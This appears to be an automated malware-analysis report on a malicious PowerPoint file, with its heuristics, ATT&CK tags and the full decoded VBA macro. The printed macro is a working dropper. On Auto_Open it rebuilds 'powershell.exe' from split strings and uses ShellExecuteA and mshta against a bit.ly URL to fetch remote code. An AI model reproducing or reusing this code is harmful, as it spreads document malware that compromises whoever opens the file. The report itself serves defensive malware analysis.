MALICIOUS
88
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an Auto_Open subroutine that triggers the execution of a PowerShell command. The script reassembles the string 'powershell.exe' and constructs a command line that includes a URL, 'http://www.bitly.com/qwuidbngsadjknavbdaksdbhk', likely to download and execute a second-stage payload. The critical heuristic firing on split keyword obfuscation further supports this finding.
Heuristics 3
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2399 bytes |
SHA-256: 32b143d84549157b482c47dd8705de8f9808dd1f9a362fc912ac49f907918489 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Class12"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function MainCallex()
Dim strFile As String
Dim clock As String
Dim coooo As Long
u4 = "" + "p" + "o" + "w" + "e" + "r" + "s" + "h" + "e" + "l" + "l" + "." + "e" + "x" + "e"
u5 = "" + "-c ""c" + "m" + "d m" + "s" + "gbox/rm" + "s" + "h" + "t" + "a "
u6 = "" + "h" + "t" + "t" + "p" + "s" + ":" + "/" + "/" + "w" + "ww" + "." + "bitl"
u7 = "" + "y.com/"
u8 = "" + """qwuidbngsadjknavbdaksdbhk"
ii = u5 + u6 + u7 + u8
clock = "OPEN"
Dim bhosa As New Class3
bhosa. _
Callex u4, ii
End Function
Attribute VB_Name = "Module111"
Sub Auto_Open()
Dim obj As New Class12
obj.MainCallex
End Sub
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 Then
#If Win64 Then ' Declare using PtrSafe for Office 64 bit
Private Declare PtrSafe Function Dainava Lib "shell32.dll" Alias "ShellExecuteA" ( _
ByVal hwnd As LongPtr, ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As LongPtr
#Else ' Declare for Office 32 bit
Private Declare Function Dainava Lib "shell32.dll" Alias "ShellExecuteA" ( _
ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If
#Else ' Declare for Office 32 bit
Private Declare Function Dainava Lib "shell32.dll" Alias "ShellExecuteA" ( _
ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
#End If
Public Sub Callex(ByVal mora As String, ByVal nora As String)
Dim nona As Integer
nona = Dainava(0&, "", mora, nora, "", 0)
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 23040 bytes |
SHA-256: 26be66be417ae2eac59c4bdee6e4b3edf2d76af419cf50a2a1471e764ad0ab50 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.